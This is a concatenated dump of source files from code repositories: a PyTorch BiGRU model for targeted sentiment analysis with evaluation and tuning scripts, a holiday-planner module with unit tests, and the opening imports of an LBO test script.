from .nonlpl import NoNLPL | {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,723 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /scripts/eval.py | """
Main script used to run and test a model, for Targeted Sentment Ananalysis.
The dataset used should be taken from the lattest NoReCfine repository.
"""
import argparse
import torch
from torch import nn
from torch.utils.data import DataLoader
import torchtext
from torchtext.datasets import SequenceTaggingDataset
from torchtext.vocab import Vectors
import numpy as np
import sentarget
from sentarget.datasets import NoReCfine
from sentarget.metrics import ConfusionMatrix
from sentarget.utils import describe_dict
class Eval:
"""
Evaluate and test our model trained on the NoReCfine dataset.
This class load and preprocess the data, and then evaluate the model.
"""
def __init__(self, model_path='model.pt', data_path='data', device='cpu'):
self.model_path = model_path
self.data_path = data_path
self.device = device
@classmethod
def from_args(cls):
parser = argparse.ArgumentParser()
parser.add_argument("--model", "-m", default='model.pt', type=str,
help='Path to the saved pytorch model.')
parser.add_argument("--data", "-d", default='data/test.conll', type=str,
help='Path to the dataset, in the same format as NoReC dataset.')
args = parser.parse_args()
return Eval(model_path=args.model, data_path=args.data)
def run(self):
"""Preprocess and eval the model.
"""
# Extract Fields from a CONLL dataset file
TEXT = torchtext.data.Field(lower=False, include_lengths=True, batch_first=True)
LABEL = torchtext.data.Field(batch_first=True, unk_token=None)
FIELDS = [("text", TEXT), ("label", LABEL)]
train_data, eval_data, test_data = NoReCfine.splits(FIELDS)
data = SequenceTaggingDataset(self.data_path, FIELDS, encoding="utf-8", separator="\t")
# Build the vocabulary
VOCAB_SIZE = 1_200_000
VECTORS = Vectors(name='model.txt', url='http://vectors.nlpl.eu/repository/20/58.zip')
# Create the vocabulary for words embeddings
TEXT.build_vocab(train_data,
max_size=VOCAB_SIZE,
vectors=VECTORS,
unk_init=torch.Tensor.normal_)
LABEL.build_vocab(train_data)
# General information
text_length = [len(sentence) for sentence in list(data.text)]
print(f"\nNumber of sentences in {self.data_path}: {len(text_length):,}")
print(f'Number of words in {self.data_path}: {sum(text_length):,}')
# Generate iterator made of 1 example
BATCH_SIZE = 1
device = torch.device(self.device)
iterator = torchtext.data.BucketIterator(data,
batch_size=BATCH_SIZE,
sort_within_batch=True,
device=device)
# Loss function
criterion = nn.CrossEntropyLoss(ignore_index=0, weight=torch.tensor(
[1, 0.06771941, 0.97660534, 0.97719714, 0.98922782, 0.98925029]))
# Load the model
model = torch.load(self.model_path)
# Make sure the dictionary containing performances / scores is empty before running the eval method
# model.reset()
performance = model.evaluate(iterator, criterion, verbose=True)
print(describe_dict(performance, sep_key=' | ', sep_val=': ', pad=True))
confusion = ConfusionMatrix(data=performance['confusion'])
print("confusion matrix:")
print(np.array2string(confusion.normalize(), separator=', ', precision=3, floatmode='fixed'))
if __name__ == "__main__":
Eval.from_args().run()
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,724 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/tuner/__init__.py | from .tuner import Tuner
from .functional import * | {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,725 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/__init__.py | from sentarget import datasets, metrics, nn
from sentarget.tuner import Tuner
from sentarget.nn import Solver
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,726 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/nn/models/gru.py | r"""
The Bilinear Recurrent network is a vanilla model used for targeted sentiment analysis,
and compared to more elaborated models.
Example:
.. code-block:: python
# Defines the shape of the models
INPUT_DIM = len(TEXT.vocab)
EMBEDDING_DIM = 100
HIDDEN_DIM = 128
OUTPUT_DIM = len(LABEL.vocab)
N_LAYERS = 2
BIDIRECTIONAL = True
DROPOUT = 0.25
PAD_IDX = TEXT.vocab.stoi[TEXT.pad_token]
model = BiGRU(INPUT_DIM,
EMBEDDING_DIM,
HIDDEN_DIM,
OUTPUT_DIM,
N_LAYERS,
BIDIRECTIONAL,
DROPOUT,
PAD_IDX)
"""
import time
import torch
import torch.nn as nn
from sentarget.metrics import ConfusionMatrix
from sentarget.utils import progress_bar
from .model import Model
class BiGRU(Model):
r"""This bilinear model uses the `sklearn` template, i.e. with a fit method within the module.
Make sure to add a criterion and optimizer when loading a model.
* :attr:`input_dim` (int): input dimension, i.e. dimension of the incoming words.
* :attr:`embedding_dim` (int): dimension of the word embeddigns.
* :attr:`hidden_dim` (int): dimmension used to map words with the recurrent unit.
* :attr:`output_dim` (int): dimension used for classification. This one should be equals to the number of classes.
* :attr:`n_layers` (int): number of recurrent layers.
* :attr:`bidirectional` (bool): if `True`, set two recurrent layers in the opposite direction.
* :attr:`dropout` (float): ratio of connections set to zeros.
* :attr:`pad_idx_text` (int): index of the `<pad>` text token.
* :attr:`pad_idx_label` (int): index of the `<pad>` label token.
* :attr:`embeddings` (torch.Tensor): pretrained embeddings, of shape ``(input_dim, embeddings_dim)``.
Examples::
>>> INPUT_DIM = len(TEXT.vocab)
>>> EMBEDDING_DIM = 100
>>> HIDDEN_DIM = 128
>>> OUTPUT_DIM = len(LABEL.vocab)
>>> N_LAYERS = 2
>>> BIDIRECTIONAL = True
>>> DROPOUT = 0.25
>>> PAD_IDX_TEXT = TEXT.vocab.stoi[TEXT.pad_token]
>>> PAD_IDX_LABEL = LABEL.vocab.stoi[LABEL.unk_token]
>>> model = BiGRU(INPUT_DIM,
... EMBEDDING_DIM,
... HIDDEN_DIM,
... OUTPUT_DIM,
... N_LAYERS,
... BIDIRECTIONAL,
... DROPOUT,
... pad_idx_text=PAD_IDX_TEXT,
... pad_idx_label=PAD_IDX_LABEL)
>>> criterion = nn.CrossEntropyLoss()
>>> optimizer = metrics.Adam(model.parameters())
>>> model.fit(50, train_data, eval_data, criterion, optimizer)
"""
def __init__(self,
input_dim,
embedding_dim=100,
hidden_dim=128,
output_dim=7,
n_layers=2,
bidirectional=True,
dropout=0.25,
pad_idx_text=1,
unk_idx_text=0,
pad_idx_label=0,
embeddings=None):
super().__init__()
# dimensions
self.embedding_dim = embedding_dim
self.output_dim = output_dim
# modules
self.embedding = nn.Embedding(input_dim, embedding_dim, padding_idx=pad_idx_text)
self.gru = nn.GRU(embedding_dim, hidden_dim, n_layers, bidirectional=bidirectional, batch_first=True,
dropout=dropout)
self.fc = nn.Linear(hidden_dim * 2 if bidirectional else hidden_dim, output_dim)
self.dropout = nn.Dropout(dropout)
if embeddings is not None:
ignore_index = [idx for idx in [pad_idx_text, unk_idx_text] if idx is not None]
self.init_embeddings(embeddings, ignore_index=ignore_index)
# tokens
self.pad_idx_text = pad_idx_text
self.pad_idx_label = pad_idx_label
self.unk_idx_text = unk_idx_text
def init_embeddings(self, embeddings, ignore_index=None):
r"""Initialize the embeddings vectors from pre-trained embeddings vectors.
.. Warning::
By default, the embeddings will set to zero the tokens at indices 0 and 1,
that should corresponds to <pad> and <unk>.
Examples::
>>> # TEXT: field used to extract text, sentences etc.
>>> PAD_IDX = TEXT.vocab.stoi[TEXT.pad_token]
>>> UNK_IDX = TEXT.vocab.stoi[TEXT.unk_token]
>>> pretrained_embeddings = TEXT.vocab.vectors
>>> model.init_embeddings(pretrained_embeddings, ignore_index=[PAD_IDX, UNK_IDX])
Args:
embeddings (torch.tensor): pre-trained word embeddings, of shape ``(input_dim, embedding_dim)``.
ignore_index (int or iterable): if not `None`, set to zeros tensors at the indices provided.
"""
self.embedding.weight.data.copy_(embeddings)
if ignore_index is not None:
if isinstance(ignore_index, int):
self.embedding.weight.data[ignore_index] = torch.zeros(self.embedding_dim)
elif isinstance(ignore_index, list) or isinstance(ignore_index, tuple):
for index in ignore_index:
self.embedding.weight.data[index] = torch.zeros(self.embedding_dim)
elif isinstance(ignore_index, dict):
raise KeyError("Ambiguous `ignore_index` provided. "
"Please provide an iterable like a `list` or `tuple`.")
def forward(self, text, length):
r"""One forward step.
.. note::
The forward propagation requires text's length, so a padded pack can be applied to batches.
Args:
text (torch.tensor): text composed of word embeddings vectors from one batch.
length (torch.tensor): vector indexing the lengths of `text`.
Examples::
>>> for batch in data_iterator:
>>> text, length = batch.text
>>> model.forward(text, length)
"""
# Word embeddings
embeddings = self.embedding(text)
# Apply a dropout
embedded = self.dropout(embeddings)
# Pack and pad a batch
packedembeds = nn.utils.rnn.pack_padded_sequence(embedded, length, batch_first=True)
# Apply the recurrent cell
packed_output, h_n = self.gru(packedembeds)
# Predict
output = nn.utils.rnn.pad_packed_sequence(packed_output, batch_first=True)[0]
# Apply another dropout and a linear layer for classification tasks
predictions = self.fc(self.dropout(output))
return predictions
def get_accuracy(self, y_tilde, y):
r"""Computes the accuracy from a set of predictions and gold labels.
.. note::
The resulting accuracy does not count `<pad>` tokens.
Args:
y_tilde (torch.tensor): predictions.
y (torch.tensor): gold labels.
Returns:
torch.tensor: the global accuracy, of shape 0.
"""
non_pad_elements = (y != self.pad_idx_label).nonzero()
correct = y_tilde[non_pad_elements].squeeze(1).eq(y[non_pad_elements])
accuracy = correct.sum() / torch.FloatTensor([y[non_pad_elements].shape[0]])
# Handles division by 0
accuracy = accuracy if not torch.isnan(accuracy) else torch.tensor(0)
return accuracy
def run(self, iterator, criterion, optimizer, verbose=True):
r"""Train one time the model on iterator data.
Args:
iterator (Iterator): iterator containing batch samples of data.
criterion (Loss): loss function to measure scores.
optimizer (Optimizer): optimizer used during training to update weights.
verbose (bool): if `True` display a progress bar.
Returns:
dict: the performance and metrics of the training session.
"""
# Initialize the variables
start_time = time.time()
epoch_loss = 0
epoch_acc = 0
class_labels = list(range(self.output_dim))
class_labels.pop(self.pad_idx_label)
confusion_matrix = ConfusionMatrix(labels=class_labels)
# Train mode
self.train()
for (idx, batch) in enumerate(iterator):
optimizer.zero_grad()
# One forward step
text, length = batch.text
y_hat = self.forward(text, length)
y_hat = y_hat.view(-1, y_hat.shape[-1])
label = batch.label.view(-1)
# Get the predicted classes
y_tilde = y_hat.argmax(dim=1, keepdim=True)
# Compute the loss and update the weights
loss = criterion(y_hat, label)
loss.backward()
optimizer.step()
epoch_loss += loss.item()
# Default accuracy
acc = self.get_accuracy(y_tilde, label)
epoch_acc += acc.item()
# Optional: display a progress bar
if verbose:
progress_bar(idx, len(iterator) - 1, prefix="Training:\t", start_time=start_time)
# Update the confusion matrix
confusion_matrix.update(label.long().numpy(), y_tilde.long().numpy())
# Store the loss, accuracy and metrics in a dictionary
results_train = {"loss": epoch_loss / len(iterator),
"accuracy": epoch_acc / len(iterator),
**confusion_matrix.to_dict()
}
return results_train
def evaluate(self, iterator, criterion, verbose=True):
r"""Evaluate one time the model on iterator data.
Args:
iterator (Iterator): iterator containing batch samples of data.
criterion (Loss): loss function to measure scores.
verbose (bool): if `True` display a progress bar.
Returns:
dict: the performance and metrics of the training session.
"""
# Initialize the variables
start_time = time.time()
epoch_loss = 0
epoch_acc = 0
class_labels = list(range(self.output_dim))
class_labels.pop(self.pad_idx_label)
confusion_matrix = ConfusionMatrix(labels=class_labels)
# Eval mode
self.eval()
with torch.no_grad():
for (idx, batch) in enumerate(iterator):
# One forward step
text, length = batch.text
y_hat = self.forward(text, length)
y_hat = y_hat.view(-1, y_hat.shape[-1])
label = batch.label.view(-1)
# Get the predicted classes
y_tilde = y_hat.argmax(dim=1, keepdim=True)
# Compute the loss
loss = criterion(y_hat, label)
epoch_loss += loss.item()
# Default accuracy
acc = self.get_accuracy(y_tilde, label)
epoch_acc += acc.item()
# Optional: display a progress bar
if verbose:
progress_bar(idx, len(iterator) - 1, prefix="Evaluation:\t", start_time=start_time)
# Update the confusion matrix
confusion_matrix.update(label.long().numpy(), y_tilde.long().numpy())
# Store the loss, accuracy and metrics in a dictionary
results_eval = {"loss": epoch_loss / len(iterator),
"accuracy": epoch_acc / len(iterator),
**confusion_matrix.to_dict()
}
return results_eval
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,727 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/tuner/functional.py | """
Optimization functions used for hyperparameters tuning.
"""
import inspect
from sentarget.utils import rgetattr, rsetattr
def tune(model, config):
r"""
.. note::
If the key is separated with a '.', it means the first index is the module to change,
then the attribute ``key = 'LSTM.dropout'`` will modify only the dropout corresponding to ``LSTM`` layers
The double underscore ``__`` is used to modify a specific attribute by its name (and not its type),
like ``key = 'linear__in_features'`` will modify only the ``in_features`` attribute from the
``Linear`` layer saved under the attribute ``linear`` of the custom model.
.. warning::
The operation modify the model inplace.
Args:
model (Model): the model to tune its hyperparameters.
config (dict): dictionary of parameters to change.
Returns:
dict: the configuration to apply to a model.
Examples::
>>> from sentarget.nn.models.lstm import BiLSTM
>>> # Defines the shape of the models
>>> INPUT_DIM = len(TEXT.vocab)
>>> EMBEDDING_DIM = 100
>>> HIDDEN_DIM = 128
>>> OUTPUT_DIM = len(LABEL.vocab)
>>> N_LAYERS = 2
>>> BIDIRECTIONAL = True
>>> DROPOUT = 0.25
>>> PAD_IDX = TEXT.vocab.stoi[TEXT.pad_token]
>>> model = BiLSTM(INPUT_DIM,
... EMBEDDING_DIM,
... HIDDEN_DIM,
... OUTPUT_DIM,
... N_LAYERS,
... BIDIRECTIONAL,
... DROPOUT,
... PAD_IDX)
>>> config = {'LSTM.dropout': 0.2}
>>> tune(model, config)
"""
for (key, value) in config.items():
attribute_list = key.split('__')
attribute = attribute_list[0]
module_path = key.split('__')[-1]
# Change values from the attribute's key
if len(attribute_list) == 2:
attribute = getattr(model, attribute)
try:
rsetattr(attribute, module_path, value)
except AttributeError:
pass
# Change values from module's type
elif len(attribute_list) == 1:
attribute = '.'.join(attribute.split('.')[1:])
for module in model.modules():
try:
rsetattr(module, attribute, value)
except AttributeError:
pass
else:
raise KeyError(f'path to attribute {key} is ambiguous. Please separate objects with a `.` or `__`. \
More informations at https://pages.github.uio.no/arthurd/in5550-exam/source/package.html#sentarget-optim')
def init_cls(class_instance, config):
r"""Initialize a class instance from a set of possible values.
.. note::
More parameters can be added than the object need. They will just not be used.
Args:
class_instance (class): class to initialize.
config (dict): possible values of init parameters.
Returns:
initialized object
"""
# Get the init parameters
arguments = inspect.getargspec(class_instance.__init__).args
# Remove the 'self' argument, which can't be changed.
arguments.pop(0)
init = {key: value for (key, value) in config.items() if key in arguments}
return class_instance(**init)
def tune_optimizer(optimizer, config):
r"""Tune te defaults parameters for an optimizer.
.. warning::
The operation modify directly the ``defaults`` optimizer's dictionary.
Args:
optimizer (Optimizer): optimizer to tune.
config (dict): dictionary of new parameters to set.
"""
for (key, value) in config.items():
if key in optimizer.defaults:
optimizer.defaults[key] = value
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,730 | vesamattila-code/visma_holidayplanner | refs/heads/master | /unittests.py | import unittest
from holidayplanner import HolidayPlanner, HolidayCVSHandler,HolidayStartLaterThanEnd,HolidayAccess,HolidayRangeTooWide
import datetime
from datetime import date, timedelta, datetime
import pandas as pd
class TestHolidayPlanner(unittest.TestCase):
def test_holiday_access(self):
acc=HolidayAccess()
acc.get_access()
acc.set_access(0)
with self.assertRaises(NotImplementedError):
acc.holidays_in_range(date(2020,12,31),date(2020,10,1))
def test_planner_default_init(self):
p = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
self.assertTrue(p)
def test_days_needed_start_later_than_end(self):
planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
with self.assertRaises(HolidayStartLaterThanEnd):
planner.days_needed(date(2020,12,31),date(2020,10,1))
def test_days_needed_range_over_max_range(self):
planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
with self.assertRaises(HolidayRangeTooWide):
planner.days_needed(date(2020,10,1),date(2020,12,1))
def test_planner_with_empty_param(self):
with self.assertRaises(FileNotFoundError):
planner = HolidayPlanner(HolidayCVSHandler(''))
result = planner.days_needed(date(2020,10,1),date(2020,10,12))
def test_planner_with_non_string(self):
planner=HolidayPlanner(HolidayCVSHandler(123))
def test_sundays_in_range(self):
planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
self.assertEqual(planner.sundays_in_range(
date(2020,10,1),date(2020,10,31)),4)
def test_days_needed_valid_month_25_days(self):
planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
self.assertEqual(planner.days_needed(date(2020,1,1),
date(2020,1,31)),25)
def test_days_needed_valid_month_15_days(self):
planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
self.assertEqual(planner.days_needed(
date(2020,4,10), date(2020,5,1)),16)
def test_days_needed_valid_month_year_changing(self):
planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
self.assertEqual(planner.days_needed(date(2020,12,25),
date(2021,1,7)),9)
def test_days_needed_one_day_scope(self):
planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
self.assertEqual(planner.days_needed(
date(2021,12,25),date(2021,12,25)),1)
def test_days_needed_without_fake_sunday_added(self):
planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
self.assertEqual(planner.days_needed(
date(2020,10,1),date(2020,10,30)),26)
def test_days_needed_with_fake_sunday_added(self):
planner = HolidayPlanner(HolidayCVSHandler('holiday_dates_with_fake_sunday_11102020.csv'))
self.assertEqual(planner.days_needed(
date(2020,10,1),date(2020,10,30)),26)
if __name__ == '__main__':
unittest.main() | {"/unittests.py": ["/holidayplanner.py"]} |
50,731 | vesamattila-code/visma_holidayplanner | refs/heads/master | /holidayplanner.py | import pandas as pd
from datetime import date, timedelta, datetime
import os.path
from os import path
class HolidayRangeTooWide(Exception):
pass
class HolidayStartLaterThanEnd(Exception):
pass
HOLIDAY_MAX_RANGE = 50
class HolidayAccess():
"""Generic interface class to official holiday info."""
def __init__(self,access = 0):
self.access = access
def get_access(self):
return self.access
def holidays_in_range(self, start, end):
raise NotImplementedError
def set_access(self, access):
self.access = access
class HolidayCVSHandler(HolidayAccess):
"""Holiday data handler."""
def __init__(self, access):
HolidayAccess.__init__(self,access)
def holidays_in_range(self, start, end):
if not path.exists(self.access):
raise FileNotFoundError
count = 0
date_to_check = start
official_holidays=pd.read_csv(
self.access, names=['date'])
for i in official_holidays['date']:
holiday = datetime.strptime(i, "%d.%m.%Y").date()
d = date_to_check
while d <= end:
if holiday == d:
#skip if day is sunday
if holiday.weekday() != 6:
count+=1
d+=timedelta(days=1)
return count
class HolidayPlanner():
"""Holiday planner class."""
def __init__(self, holiday_access):
self.holiday_handler = holiday_access
self.holiday_max_range = HOLIDAY_MAX_RANGE
def days_needed(self, start, end):
holidays_needed=1
if start > end:
raise HolidayStartLaterThanEnd
if(start != end):
delta = end - start
if delta.days > self.holiday_max_range:
raise HolidayRangeTooWide
holidays_needed = self.calculate_holidays_needed(
delta.days+1, # count of days is delta +1
self.sundays_in_range(start,end),
self.holiday_handler.holidays_in_range(
start,end))
return holidays_needed
def sundays_in_range(self, d0, d1):
d0 += timedelta(days=6 - d0.weekday())
day_count = 0
while d0 <= d1:
d0 += timedelta(days=7)
day_count += 1
return day_count
def calculate_holidays_needed(self,days, sundays,holidays):
return days-sundays-holidays
| {"/unittests.py": ["/holidayplanner.py"]} |
50,732 | changliukean/KEAN3 | refs/heads/master | /lbo_testcases.py | from utility.dispatchUtils import load_pp_tech_info, convert_uc_dataframe, load_solar_dispatch, load_nuclear_dispatch
from datetime import datetime, date
from database.dbPCUC import put_characteristics
from database.dbDispatch import put_dispatch, get_dispatch
from database.dbLBO import put_powerplant, put_technology, get_powerplants, get_technology, put_financials_lbo, get_financials_lbo, put_lbo_assumptions, get_lbo_assumptions,get_portfolio_with_powerplant,get_powerplants_by_portfolio
from database.dbScenarioMaster import insert_scenario_master, delete_scenario_master
from utility.lboUtils import read_excel_lbo_inputs
from lbo import lbo
from model.Entity import Powerplant
from model.Portfolio import Portfolio
from utility.dateUtils import get_month_list
import numpy as np
import sys
import pandas as pd
def run_convert_uc(project_name, date_start, date_end, pc_scenario, pc_version, plant_list=[], plant_tech_master_file=None, push_to_powerplant=False, push_to_technology=False, push_to_plant_characteristics=False):
